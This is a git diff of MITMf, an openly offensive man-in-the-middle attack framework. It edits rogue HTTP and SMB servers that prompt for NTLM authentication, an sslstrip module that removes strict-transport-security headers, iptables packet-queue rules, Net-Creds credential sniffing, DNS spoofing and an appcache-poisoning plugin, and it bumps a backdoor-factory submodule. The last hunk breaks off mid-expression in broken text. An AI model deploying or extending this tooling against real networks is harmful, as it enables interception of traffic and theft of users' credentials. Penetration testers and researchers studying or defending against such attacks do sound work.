index 82296eb..75d0c1d 100644
--- a/core/servers/HTTP.py
+++ b/core/servers/HTTP.py
@@ -49,10 +49,10 @@ class HTTP:
def start(self):
try:
- if OsInterfaceIsSupported():
- server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
- else:
- server = ThreadingTCPServer(('', 80), HTTP1)
+ #if OsInterfaceIsSupported():
+ #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
+ #else:
+ server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
@@ -267,7 +267,7 @@ def PacketSequence(data, client):
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
- log.info("{} [HTTP] Sending NTLM authentication request to".format(client))
+ log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
diff --git a/core/servers/SMB.py b/core/servers/SMB.py
index 198ba4d..cac8027 100644
--- a/core/servers/SMB.py
+++ b/core/servers/SMB.py
@@ -28,12 +28,12 @@ class SMB:
def start(self):
try:
- if OsInterfaceIsSupported():
- server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
- server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
- else:
- server1 = ThreadingTCPServer(('', 445), SMB1)
- server2 = ThreadingTCPServer(('', 139), SMB1)
+ #if OsInterfaceIsSupported():
+ # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
+ # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
+ #else:
+ server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
+ server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py
index f196842..f9a2719 100644
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@@ -155,7 +155,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
- clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo)
+ clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
@@ -179,7 +179,7 @@ class ServerConnection(HTTPClient):
self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
- for header, value in self.client.headers.iteritems():
+ for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
diff --git a/core/utils.py b/core/utils.py
index c3ae067..7781bad 100644
--- a/core/utils.py
+++ b/core/utils.py
@@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
- os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1')
+ os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True
\ No newline at end of file
diff --git a/libs/bdfactory b/libs/bdfactory
index dadf1d2..d2f3521 160000
--- a/libs/bdfactory
+++ b/libs/bdfactory
@@ -1 +1 @@
-Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5
+Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586
diff --git a/logs/.gitignore b/logs/.gitignore
index cf7c24d..364db4d 100644
--- a/logs/.gitignore
+++ b/logs/.gitignore
@@ -1,5 +1,5 @@
*
!.gitignore
!responder/
-!dnschef/
+!dns/
!ferret-ng/
diff --git a/logs/dnschef/.gitignore b/logs/dns/.gitignore
similarity index 100%
rename from logs/dnschef/.gitignore
rename to logs/dns/.gitignore
diff --git a/mitmf.py b/mitmf.py
index 08a8b73..03c7ed3 100755
--- a/mitmf.py
+++ b/mitmf.py
@@ -41,7 +41,7 @@ mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if os.geteuid() != 0:
- sys.exit("[-] The derp is strong with this one")
+ sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
@@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
#add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
-sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
+sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
-sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic')
+sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
@@ -73,6 +73,15 @@ options = parser.parse_args()
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
+from core.logger import logger
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("MITMf", formatter)
+
+from core.netcreds import NetCreds
+
+if options.read_pcap:
+ NetCreds().parse_pcap(options.read_pcap)
+
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
@@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
settings.Config.populate(options)
-from core.logger import logger
-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-log = logger().setup_logger("MITMf", formatter)
-
log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
-from core.netcreds import NetCreds
-NetCreds().start(options.interface, options.ip, options.read_pcap)
+print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
+
+NetCreds().start(options.interface, options.ip)
+print "|"
+print "|_ Net-Creds v{} online".format(NetCreds.version)
-from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins
-from core.sslstrip.StrippingProxy import StrippingProxy
-from core.sslstrip.URLMonitor import URLMonitor
-
-URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
-URLMonitor.getInstance().setCaching(options.preserve_cache)
-CookieCleaner.getInstance().setEnabled(options.killsessions)
-
-strippingFactory = http.HTTPFactory(timeout=10)
-strippingFactory.protocol = StrippingProxy
-
-reactor.listenTCP(options.listen_port, strippingFactory)
ProxyPlugins().all_plugins = plugins
-
-print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
for plugin in plugins:
#load only the plugins that have been called at the command line
@@ -126,48 +120,64 @@ for plugin in plugins:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
- plugin.reactor(strippingFactory)
plugin.start_config_watch()
-print "|"
-print "|_ Sergio-Proxy v0.2.1 online"
-print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-print "|"
-
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
- pfilter.start()
print "|_ PacketFilter online"
- print "| |_ Applying filter {} to incoming packets".format(options.filter)
+ for filter in options.filter:
+ print " |_ Applying filter {} to incoming packets".format(filter)
+ try:
+ pfilter.start()
+ except KeyboardInterrupt:
+ pfilter.stop()
+ shutdown()
-print "|_ Net-Creds v{} online".format(NetCreds.version)
+else:
+ from core.sslstrip.CookieCleaner import CookieCleaner
+ from core.sslstrip.StrippingProxy import StrippingProxy
+ from core.sslstrip.URLMonitor import URLMonitor
-#Start mitmf-api
-from core.mitmfapi import mitmfapi
-print "|_ MITMf-API online"
-mitmfapi().start()
+ URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+ URLMonitor.getInstance().setCaching(options.preserve_cache)
+ CookieCleaner.getInstance().setEnabled(options.killsessions)
-#Start the HTTP Server
-from core.servers.HTTP import HTTP
-HTTP().start()
-print "|_ HTTP server online"
+ strippingFactory = http.HTTPFactory(timeout=10)
+ strippingFactory.protocol = StrippingProxy
-#Start DNSChef
-from core.servers.DNS import DNSChef
-DNSChef().start()
-print "|_ DNSChef v{} online".format(DNSChef.version)
+ reactor.listenTCP(options.listen_port, strippingFactory)
-#Start the SMB server
-from core.servers.SMB import SMB
-SMB().start()
-print "|_ SMB server online\n"
+ for plugin in plugins:
+ if vars(options)[plugin.optname] is True:
+ plugin.reactor(strippingFactory)
-#start the reactor
-reactor.run()
-print "\n"
+ print "|_ Sergio-Proxy v0.2.1 online"
+ print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-if options.filter:
- pfilter.stop()
+ #Start mitmf-api
+ from core.mitmfapi import mitmfapi
+ print "|"
+ print "|_ MITMf-API online"
+ mitmfapi().start()
-shutdown()
\ No newline at end of file
+ #Start the HTTP Server
+ from core.servers.HTTP import HTTP
+ HTTP().start()
+ print "|_ HTTP server online"
+
+ #Start DNSChef
+ from core.servers.DNS import DNSChef
+ DNSChef().start()
+ print "|_ DNSChef v{} online".format(DNSChef.version)
+
+ #Start the SMB server
+ from core.servers.SMB import SMB
+ SMB().start()
+ print "|_ SMB server online\n"
+
+ #start the reactor
+ reactor.run()
+ print "\n"
+
+ shutdown()
diff --git a/plugins/appcachepoison.py b/plugins/appcachepoison.py
index c456db2..505c5f6 100644
--- a/plugins/appcachepoison.py
+++ b/plugins/appcachepoison.py
@@ -36,6 +36,7 @@ class AppCachePlugin(Plugin):
from core.sslstrip.URLMonitor import URLMonitor
self.urlMonitor = URLMonitor.getInstance()
+ self.urlMonitor.caching = True
self.urlMonitor.setAppCachePoisoning()
def response(self, response, request, data):
@@ -72,29 +73,25 @@ class AppCachePlugin(Plugin):
p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content
- f = open(p + '.replace', 'r')
- data = f.read()
- f.close()
+ with open(p + '.replace', 'r') as f:
+ data = f.read()
elif os.path.exists(p + '.append'): # append file to body
- f = open(p + '.append', 'r')
- data += f.read()
- f.close()
+ with open(p + '.append', 'r') as f:
+ data += f.read()
elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content
- f = open(p + '.replace', 'r')
- data = f.read()
- f.close()
+ with open(p + '.replace', 'r') as f:
+ data = f.read()
elif os.path.exists(p + '.append'): # append file to body
- f = open(p + '.append', 'r')
- appendix = f.read()
- data = re.sub(re.compile("
+ Please click here if you are not redirected automatically
+